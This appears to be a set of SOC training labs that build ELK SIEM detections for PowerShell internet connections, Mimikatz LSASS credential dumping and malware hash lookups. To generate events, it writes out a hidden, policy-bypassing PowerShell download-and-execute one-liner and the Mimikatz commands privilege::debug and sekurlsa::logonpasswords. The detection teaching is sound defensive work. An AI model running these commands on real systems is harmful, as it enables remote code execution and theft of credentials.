Exercise 6-8
Exercise 6: Host Level Incident Detection: Creating ELK Use Case for Monitoring Trusted Binaries Connecting to the Internet
Lab Scenario
Attackers use trusted binaries, to download and execute malicious code from remote sources. Attackers mainly use PowerShell as a downloader, lateral movement and fileless threats. Monitoring execution for powershell commands to connect to the internet, will help SOC Analyst take immediate action to stop damage and prevent further damage from happening.
Lab Objectives
The objective of this lab is to create ELK SIEM use case for monitoring Powershell Command connecting to the internet for downloading and executing scripts.
Lab Tasks
In this exercise you have learnt how to create ELK SIEM use case for monitoring Powershell Command connecting to the internet for downloading and executing scripts.
Exercise 7:Host Level Incident Detection: Creating ELK Use Case for Monitoring Credential dumping using Mimikatz
Lab Scenario
The goal of any attacker is to retrieve credentials from memory after gaining privileged access to system. The tools used by attackers will granting itself read and query permissions against LSASS, which is required to read passwords from memory. Hence, monitoring execution of lsass.exe accessed with a GrantedAccess flag can be helpfull to SOC analyst for identifying attempts to retrive credentials from memory by anyone.
Lab Objectives
The objective of this lab is to create ELK SIEM use case for monitoring execution of lsass.exe with GrantedAccess flag when using mimikatz tool to retrive credetials from memory.
Lab Tasks
In this exercise you have learnt how to create ELK SIEM use case for monitoring execution of lsass.exe with GrantedAccess flag when using mimikatz tool to retrive credetials from memory.
Exercise 8:Host Level Incident Detection: Creating ELK Use Case for Monitoring Malware activity in the system.
Lab Scenario
Monitoring logs for malware activity based on malware signatures enables quick identification of compromised systems. The log collected from sysmon will show the file hash information. This information can be queried in virustotal.com to find if it is asscoated to an infected file.
Lab Objectives
The objective of this lab is to create ELK SIEM use case for monitoring malware activity by comparing file hash information of sysmon events in virustotal.com.
In this exercise you have learnt how to create ELK SIEM use case for monitoring malware activity by comparing file hash information of sysmon events in virustotal.com.
Lab Scenario
Attackers use trusted binaries, to download and execute malicious code from remote sources. Attackers mainly use PowerShell as a downloader, lateral movement and fileless threats. Monitoring execution for powershell commands to connect to the internet, will help SOC Analyst take immediate action to stop damage and prevent further damage from happening.
Lab Objectives
The objective of this lab is to create ELK SIEM use case for monitoring Powershell Command connecting to the internet for downloading and executing scripts.
Lab Tasks
- Click WinServer2012.
Note: If Windows2012 is already launched, skip to step 3 - Click Ctrl+Alt+Del. By default Admin account is selected, type Pa$$w0rd and press Enter to login.
- A pop-up "Do you want to find PCs,devices, and content on this network, and automatically connect to devices like printers and TVs? will appear. Click Yes
- To install and configure Sysmon. Navigate to E:\SOC-Tools\ Module 04 Incident Detection with Security Information and Event Management (SIEM) and copy Sysmon.Zip.
Note: To get additional details about powershell commands executed, we will use Sysmon. Sysmon will monitor and log system activity to the Windows event logs. Note: If you get Windows Security pop-up, click OK. - Paste the copied Sysmon.zip file under C: drive.
- Right-click and unzip all the zip files under C: drive using Extract here option from context menu. Delete the zip files after unzipping.
- To configure sysmon to monitor events generated by LSASS.exe. Open Sysmon folder. Right-click sysmonconfig-export.xml file and click Edit with Notepad++ from context menu to open the file.
Note: Local Security Authority Subsystem Service (LSASS.exe) is a process in Microsoft Windows operating systems responsible for enforcing the security policy on the systemany file of the system. It is faked by malware and can become corrupted by a virus or trojan. - Go to Line No. 450 and add the following line
<TargetImage condition="is">C:\Windows\system32\lsass.exe</TargetImage> - Go to Line No. 452 and add the following line
<ProcessAccess onmatch="exclude"> <SourceImage condition="is">C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd.exe</SourceImage> </ProcessAccess> - Click Save and close all the open windows.
- To open command prompt in Administrator mode right-click Windows and click Command Prompt (Admin) from the context menu.
- Command prompt window will open. To navigate to c:\Sysmon directory type cd c:\Sysmon and press Enter.
- To install Sysmon type Sysmon.exe -i Sysmonconfig-export.xml -accepteula -h md5,sha256 -n -l and press Enter
- You will see message Sysmon started.
- To auto restart Sysmon service, type sc config Sysmon start= auto and press Enter. Service configuration will change to Automatic. Close the command prompt window.
- Navigate to E:\SOC-Tools\ Module 04 Incident Detection with Security Information and Event Management (SIEM) and copy Beats folder.
- Paste the copied Beats folder under C: Drive.
- Open Beats folder. Right-click and unzip the winlogbeat-6.5.4-windows-x86_64.zip file under C:\Beats. Delete the zip file after unzipping.
- click Windows Start button. Right-click on Windows PowerShell icon and click Run as Administrator from the context menu.
- To navigate to winlogbeat directory, type Cd C:\Beats\winlogbeat-6.5.4-windows-x86_64 ,press Enter.
- To install winlogbeat, type PowerShell.exe -ExecutionPolicy UnRestricted -File .\install-service-winlogbeat.ps1 and press Enter.You will see winlogbeat will be sucessfully installed and the status of winlogbeat service will be Stopped.
Note: If Security warning message appears, type R and press Enter to continue. - Navigate to C:\Beats\winlogbeat-6.5.4-windows-x86_64 and open the file winlogbeat.yml with Notepad++.
- In winlogbeat.event_logs add the following line at Line no 25.
- name: Microsoft-Windows-Sysmon/Operational Note: Make sure that the alignment of the copied line is same as that of the previous line. - In Kibana section under setup.kibana: Line no 71, delete **# ** to uncomment line and change host: "localhost:5601" to host: "10.10.1.79:5601".
- In Elasticsearch output section under output.elasticsearch: Line no 98 change hosts: ["localhost:9200"] to hosts: ["10.10.1.79:9200"] .
- Save the file winlogbeat.yml and close.
- To test winlogbeat configuration, Switch to the Windows PowerShell and type .\winlogbeat.exe test config -c .\winlogbeat.yml –e and press Enter. Config Ok message will display as shown in following screenshot.
Note: In powershell window you should be in winlogbeat-6.5.4-windows-x8664 directory before executing the above command. If not refer step no. 47 to navigate to winlogbeat-6.5.4-windows-x8664 directory. - Close all open windows.
- Right-click windows start button, Click Search and type service into search field, click on Services to open Services window.
- To start winlogbeat service, Search and select winlogbeat service, click on Start in the left pane.
- Close Services windows.
- Click SecurityOnion machine.
- Enter Username administrator, password toor, and press Enter to login.
- To open Terminal, right-click on desktop and click Open Terminal
- To configure firewall , type sudo so-allow and press Enter. Type toor as password and press Enter.
- You will see Please enter your selection. To allow Logstash Beat - port 5044/tcp type b and press Enter
- You will see **Please enter the IP address (or CIDR range) you'd like to allow to connect to port(s): 5044 ** type 10.10.1.12 and press Enter. You will see To continue and add this rule, press Enter. Otherwise, press Ctrl-c to exit. Press Enter.
- To allow Elasticsearch REST endpoint -port 9200, type sudo so-allow and press Enter. You will see Please enter your selection type e and press Enter. You will see **Please enter the IP address (or CIDR range) you'd like to allow to connect to port(s): 9200 ** type 10.10.1.12 and press Enter. You will see To continue and add this rule, press Enter. Otherwise, press Ctrl-c to exit. Press Enter. Close the terminal.
Note: if asked for password, type toor as password and press Enter - To launch Kibana, double-click Kibana, shortcut icon from the desktop.
- Your connection is not private page appears, click ADVANCED.
- Click Proceed to localhost (unsafe) link.
- Login screen appears, type username martin and password martin@123.
- On the Kibana Home page, if you see the Kibana status is Red, as shown in the screenshot. Refresh the page until it changes to Kibana status is Green or you are redirected to Management --> Create index pattern page.
- In the Kibana Management --> Create index pattern screen, in Step1 of 2: Define index pattern. Type winlogbeat*. As you begin you will see all Winlogbeat indexes in kibana. click the Next step button.
Note: If you don't find Winlogbeat indexes, wait for few minuits to load and repeat steps 45. - In the Step2 of 2: Configure settings, select @timestamp from Time Filter field name drop-down and click the Create index pattern button button.
- You will see index pattern page displaying the fieldsof the created index. Click on Discover in the left menu.
- Launch WinServer2012.
- To open Poweshell, click Windows Start button. Right-click on Windows PowerShell icon and click Run as Administrator from the context menu.
- To use powershell to launch webclient and download any malicious script. Type the following command and press Enter
powershell -exec bypass -nop -w hidden "IEX ((new-object net.webclient).downloadstring('https://www.google.com'))" Note: The use of -nop Prevents PowerShell from loading profile scripts, which get executed on launch and use of -w hidden prevent PowerShell from displaying a window when it executes code. Any powershell command executed with these two options indicates some suspicious activity. In the demo we are using https://www.google.com as download string. This string can be replaced by any malicous script by the attacker. - Close all open windows.
- Launch SecurityOnion Machine. In the Kiban Discover page type eventid:3 and eventdata.Image:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" in the Search…(e.g. status:200 AND extension:PHP) textbox and click Update button.
- You will see all the poweshell commands with event_id 3
- Expand the first event by clicking the right arrow You will see the details of the event. by following the hostSourceName, SourceIp and destination Ip. You can identify the host which initiated the connection, and where it was connected.
- You can identify any attempt made to connect to internet using Trusted binaries connecting (PowerShell).
- Close all open windows.
Note: Do not cancel the lab session. You will need the configurations done in this exercise for the upcomming exercises of this module. In case, if you cancel the lab session, you need to perform this lab steps again.
In this exercise you have learnt how to create ELK SIEM use case for monitoring Powershell Command connecting to the internet for downloading and executing scripts.
Exercise 7:Host Level Incident Detection: Creating ELK Use Case for Monitoring Credential dumping using Mimikatz
Lab Scenario
The goal of any attacker is to retrieve credentials from memory after gaining privileged access to system. The tools used by attackers will granting itself read and query permissions against LSASS, which is required to read passwords from memory. Hence, monitoring execution of lsass.exe accessed with a GrantedAccess flag can be helpfull to SOC analyst for identifying attempts to retrive credentials from memory by anyone.
Lab Objectives
The objective of this lab is to create ELK SIEM use case for monitoring execution of lsass.exe with GrantedAccess flag when using mimikatz tool to retrive credetials from memory.
Lab Tasks
- Click WinServer2012, click Ctrl+Alt+Del.
Note: If Windows2012 is already launched, skip to step 3 - By default Admin account is selected, type Pa$$w0rd and press Enter to login.
- To install Mimikatz tool. Navigate to E:\SOC-Tools\ Module 04 Incident Detection with Security Information and Event Management (SIEM) and copy mimikatz_trunk.Zip.
Note: Mimikatz tool is used to dump credentials from memory, including clear text passwords stored in system memory.
Note: If you get Windows Security pop-up, click OK. - Paste the copied mimikatz_trunk.Zip file under C: Drive.
- Right-click and unzip the mimikatztrunk.Zip file by selecting Extract to mimikatztrunk/ option. Delete the zip file after unzipping.
- Navigate to C:\mimikatz_trunk\x64 folder and double-click mimikatz.exe.
- In the mimikatz console window type privilege::debug and press Enter.
- To store the user credentials in a log file type log Userdetails.log in the mimikatz console window and press Enter.
- To dump the user credentials in the specified log file type sekurlsa::logonpasswords in the mimikatz console window and press Enter.
- Launch SecurityOnion Machine.
- Enter Username administrator, password toor, and press Enter to login.
- To launch Kibana, double-click Kibana, shortcut icon from the desktop.
- Login screen appears, type username martin and password martin@123. click Login
- Click Discover from the left pane and type eventid:10 AND eventdata.GrantedAccess: 0x1010 in the Search…(e.g. status:200 AND extension:PHP) textbox and click Update button.
- You will see all the events where a process attempted to read memory in a process
- Expand the first event by clicking the right arrow You will see the details of the event. The details will show LSASS was accessed with a GrantedAccess value of 0x1010.
- Close all open windows.
In this exercise you have learnt how to create ELK SIEM use case for monitoring execution of lsass.exe with GrantedAccess flag when using mimikatz tool to retrive credetials from memory.
Exercise 8:Host Level Incident Detection: Creating ELK Use Case for Monitoring Malware activity in the system.
Lab Scenario
Monitoring logs for malware activity based on malware signatures enables quick identification of compromised systems. The log collected from sysmon will show the file hash information. This information can be queried in virustotal.com to find if it is asscoated to an infected file.
Lab Objectives
The objective of this lab is to create ELK SIEM use case for monitoring malware activity by comparing file hash information of sysmon events in virustotal.com.
- Click WinServer2012, click Ctrl+Alt+Del.
Note: If Windows2012 is already launched, skip to step 3 - By default Admin account is selected, type Pa$$w0rd and press Enter to login.
- Navigate to E:\SOC-Tools\Module 05 Enhance Incident Detection with Threat Intelligence and copy the wikiworm folder.
- Paste the copied wikiworm folder in C: drive.
- Navigate to C:\wikiworm folder and double-click wikiworm.exe file. A pop-up box appear, click OK.
- Launch SecurityOnion Machine.
- Enter Username administrator, password toor, and press Enter to login.
- To launch Kibana, double-click Kibana, shortcut icon from the desktop.
- Login screen appears, type username martin and password martin@123. click Login
- Click Discover from the left pane and type wikiworm.exe in the Search…(e.g. status:200 AND extension:PHP) textbox and click Update button.
- Click Add a filter + link below the search textbox. In the Add filter pop-up select event_data.Image from the Fields drop-down, select is from the Operators.. drop-down. In the Values dropdown select C:\wikiworm\wikiworm.exe and click Save.
- Expand the event copy the MD5 hash value from event_data.Hashes.
Note: The MD5 Hash value is between MD5= and , - Open a new tab in the browser. Browse virustotal.com website by typing http://www.virustotal.com. Click Search.
- Paste the copied hashvalue in the URL, IP Address, domain or file hash textbox and press Enter.
- Virustotal will compare the file hash for asscoated to an infected file hash and give you you the detailed report about the malware.
- You will be able to analyze any file's hash value to check if it is a malware.
In this exercise you have learnt how to create ELK SIEM use case for monitoring malware activity by comparing file hash information of sysmon events in virustotal.com.